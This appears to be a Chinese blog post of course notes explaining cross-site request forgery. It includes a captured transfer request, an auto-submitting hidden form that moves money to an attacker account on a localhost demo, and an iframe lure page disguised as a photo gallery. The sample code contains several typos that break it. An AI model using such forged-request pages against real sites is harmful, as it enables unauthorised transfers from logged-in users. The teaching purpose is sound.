网易云课堂web安全学习第六天——了解CSRF

最新推荐文章于 2024-04-11 13:45:00 发布
最新推荐文章于 2024-04-11 13:45:00 发布
阅读量178 收藏 2
点赞数
分类专栏: 网易云课堂
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43571272/article/details/83755426
版权

第一

        CSRF漏洞是什么

              利用用户已登陆的身份,在用户不知情的情况下,已=以用户的名义完成非法操作。比如恶意留言等

 

第二

        CSRF漏洞的原理

               攻击者构造恶意界面    恶意界面的内容是从登陆账户转账至攻击者账户     用户主动访问,完成转账

             

转账操作的http网络包

Request URL:http://127.0.0.1:8080/demo/csrf/transfer.php  //这个是转账的url



Cookie:PHPSESSID=hsrccuemrdugv6k09ebs94ojj10   //用户的cookie,会存放用户的登陆凭证


Form Data view source    view URL encoded

toUser: 小红  //被转账人信息
amount:10   //转账钱数
打开页面自动完成转账的恶意代码页面

<body onload="submitForm();">  
//onload 在页面或者图像加载完成后立即发生。 全句意思是自动提交表单

     <div class="tip">加载中,请稍后...</div>
   
     <form id="transferFrom"
           action="http://127.0.0.1:8080/demo/csrf/transfer.php"  //转账地址
           method="post">
              <input type="hidden" name="toUser" value="黑客" />  
                                                          /*value属性为input元素设定值*/
              <input type="hidden" name="amount" value="10" />
     </from>
</body>

//以下代码,提交表单
<script>
       function submitFrom()
            (
              document.getElementtById("transferFrom").submit();
             )
</script>
用iframe弥补from表单提交有明显的页面跳转问题用iframe

<html>
<head>
<meta http-equiv="Content" content="text/html; charset=UTF-8">
<title>琉璃神社绝版写真,不进来看看吗?</title>
 <style>
     body  {background: url("liuli.jpg") repest:}
 </style>
</head>

<body>
      <iframe src="csrf-attack.php?t=0.98733248669" width=0 height=0></iframe>
        /*这个src=""的链接就是自动完成转账的恶意代码页面*/
</body>
</html>

 

fowlcity
关注
专栏目录
Web安全原理(3)——CSRF
yuluotianjin的博客
09-04 602
Web安全原理(3)——CSRF1.CSRF简介2.实战演示3.CSRF漏洞修复建议 1.CSRF简介 (1)CSRF(Cross-site request forgery,跨站请求伪造),通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。 同XSS一样,但很多时候很多人经常把XSS与CSRF漏洞混淆,它们之间有着本质的不同,就从信任的角度来区分: XSS:利用用户对站点的信任; CSRF:利用站点对已经身份认证的用户的信任,即攻击者伪装成站点受信用户进行攻击。 漏洞利用条件: 1、被害用户已经
web安全——CSRF攻击
Novice-XiaoSong的博客
10-22 318
CSRF CSRF(Cross—Site Request Forgery)跨站点请求伪造,主要是利用浏览器端未过期的cookie信息伪造身份通过服务器的身份验证。 防御 (1)验证 HTTP Referer 字段 (2)在请求地址中添加 token 并验证 (3)在 HTTP 头中自定义属性并验证 CSRF攻击与防御 ...
网易web安全:课后问题-CSRF
CPriLuke的博客
02-23 355
什么是CSRF 利用用户已经登录的身份,在用户毫不知情的情况下,以用户的名义完成非法操作 CSRF攻击原理 用户登录web网站,此时浏览器含有用户登录信息 黑客构造恶意网站 用户主动访问恶意网页,转账到黑客用户。 **真正完成转账的关键在于:**浏览器cookie存放有用户的登录凭证,当浏览器发送请求时,会继续带上已有的cookie 恶意网页的构造技巧: 含有攻击的网页不会显示任何内容,只...
网易云音乐歌曲评论爬虫(附源码)
Python中文社区
10-15 5876
数据科学俱乐部中国数据科学家社区♚作者:志颖 ,一个狂热的python爬虫热爱者GitHub:github.com/zyingzhou用过网易云音乐听歌的朋友都知道,网易...
CSRF跨站请求伪造CSRF PHP demo代码
05-04
CSRF跨站请求伪造CSRF PHP demo代码,带数据库,2021年5月4日,亲测可以运行
csrf搞了一上午。。终于不403了
azyxa1的博客
04-25 2004
先说我用的是Django2.0就很怪,本来给的方法就是在&lt;form&gt;标签里面加个{%csrf_token%}就OK但是我加了还是403debug页面给的一些方法 我感觉都符合, 百度了别人的方法有的说还说要改render,但是明显render里面已经包含了他们用的requestcontext,所以我也不用改。还有的人加了Middleware 这个也是过时的方法,middleware在2...
5分钟科普CSRF攻击与防御,Web安全的第一防线
02-25
目录:一、CSRF介绍二、CSRF攻击的危害三、CSRF攻击原理及过程四、CSRF漏洞检测五、CSRF漏洞预防六、最后聊聊xssCSRF(Cross-siterequestforgery)跨站请求伪造,也被称为“OneClickAttack”或者SessionRiding,通常...
WEB漏洞——CSRF
qq_63594215的博客
04-11 850
这次我来讲讲web漏洞的CSRF笔记总结,主要通过原理、类型、示例以及防御的角度展开说明,希望读者受益。CSRF(Cross-site request forgery)跨站请求伪造,也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF,是一种对网站的恶意利用。CSRF是通过伪装用户的请求来利用网站,利用网站漏洞从用户那里盗取信息说白了,就是攻击者盗用了你的身份,以你的名义发送恶意请求。
破解网易云js加密,爬虫获取网易云评论
跟着兴趣走,不要被束缚于一种技术
01-09 1179
破解网易云js加密,爬虫获取网易云评论 抓包 这里是对网页版的网易云音乐进行抓包,分析网络请求,url https://music.163.com/#/song?id=36229055 然后可以发现 所有的网易云热评都是通过https://music.163.com/weapi/v1/resource/comments/R_SO_4_32785...
CSRF 漏洞测试
weixin_30532369的博客
11-07 278
CSRF简介 CSRF中文名:跨站请求伪造,英文译为:Cross-site request forgery,CSRF攻击就是attacker(攻击者)利用victim(受害者)尚未失效的身份认证信息(cookie、session等),以某种方式诱骗victim点击attacker精心制作的恶意链接或者访问包含恶意攻击代码的页面,当victim触发成功之后,恶意代码会被执行,浏览器默默的...
爬虫和网易云音乐API的一次尝试
哈士奇是我的信仰~呜哇
11-18 2226
最近有空,在好友的呼唤下,帮助他做一个爬取网易云音乐排行榜信息的小程序,收获颇多.        进入网易云官网.F12  打开后发现网易云的API,参数被加密: 对前端不太熟,也无从下手,只知道这个信息很重要,多亏了 百度一下 ,找到了很多陈旧的博客, 有了些许蛛丝马迹. 多数用python 去写,经过一些尝试, 确定了不少可用的api 接口,但是数据大多数不是不
网易云音乐API获取分析
MiChong的博客
11-23 8万+
项目地址:https://github.com/MiChongGET/CloudMusicApi 喜欢的朋友star一下 一、网易云音乐歌曲评论数据获取分析 本来是想着用jsoup来爬取网易的评论,结果一分析发现获取的网页中找不到评论数据。研究了半天,无果。于是百度看看。 果然是大厂,在安全方面肯定做的比较多,原因是在传递参数的时候对参数进行加密,所以在我们
[转]浅谈CSRF攻击方式
weixin_34336292的博客
01-10 68
在CSDN中看到对CSRF攻击的原理及防护文章,讲解浅显易懂,特转之: 来源:http://blog.csdn.net/fationyyk/article/details/50833620 一.CSRF是什么?   CSRF(Cross-site request forgery),中文名称:跨站请求伪造,也被称为:one click attack...
网易云音乐爬虫
热门推荐
小王同学的博客
02-19 9万+
废话不多说 首先打开网易云音乐网站 , 右键检查 , 进入network 然后刷新页面 这个文件是获取音乐地址的关键文件 打开请求发现 , 它是一个post请求而且参数进行了加密 没办法只有去看网易云的js文件了 检索encSecKey 发现关键代码在 下面这个文件中(这个地址经常改变,可能你的已经不是这一个了)https://s3.music.126.net/web/s/core_a5deb9...
MATLAB实现基于SVM-RFE-BP多输入单输出回归预测(含完整的程序和代码详解)
10-18
内容概要:本文介绍了使用 MATLAB 实现基于支持向量机(SVM)、递归特征消除(RFE)和反向传播(BP)神经网络的多输入单输出回归预测模型。项目特点包括特征选择、BP神经网络建模、用户友好界面、模型评估机制以及超参数调整。文章详细描述了数据预处理、特征选择、模型训练、评估和可视化的步骤,并提供相应的 MATLAB 代码。 适合人群:具有一定编程基础的科研人员和工程技术人员,特别是从事数据科学、机器学习领域的研究人员。 使用场景及目标:适用于金融预测、疾病预测、工业生产监控和生态环境监测等领域,目的是提高数据预测的准确性。通过项目实战,学习特征选择和神经网络建模的技术细节。 其他说明:文中提到的相关代码示例和实现步骤可直接应用于实际项目中,有助于快速搭建高效的预测模型。同时,通过调整超参数和特征选择方法,可以进一步优化模型的性能。
rhino grasshoper 景观椅(附视频).gh
最新发布
10-18
【rhino@grasshoper 曲线金属座椅景观案例(文件获取/见简介)】https://www.bilibili.com/video/BV1Dx4y147Lr?vd_source=b420114c993138474d2e93d83ead77a5
基于vercel的无服务器服务,将Spark认知模型连接到微信公众号_Spark微信vercel.zip
10-18
基于vercel的无服务器服务,将Spark认知模型连接到微信公众号_Spark微信vercel
中国大机型能力评价榜:目前已有115款大机型入选,涵盖chatgpt、gpt4o、百
10-18
中国大机型能力评价榜:目前已有115款大机型入选,涵盖chatgpt、gpt4o、百度文心一言、阿里巴巴通易千问、科大飞星火、商汤SenseChat、minimax等商业机型,以及百川、qwen2、glm
CSRF攻击与防御:Web安全的第一防线
CSRF攻击与防御 CSRF(Cross-Site Request Forgery),也被称为“One Click Attack”或者Session Riding,是一种对网站的恶意利用。CSRF攻击的危害非常大,攻击者可以盗用用户的身份,以用户的名义发送恶意请求,对...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值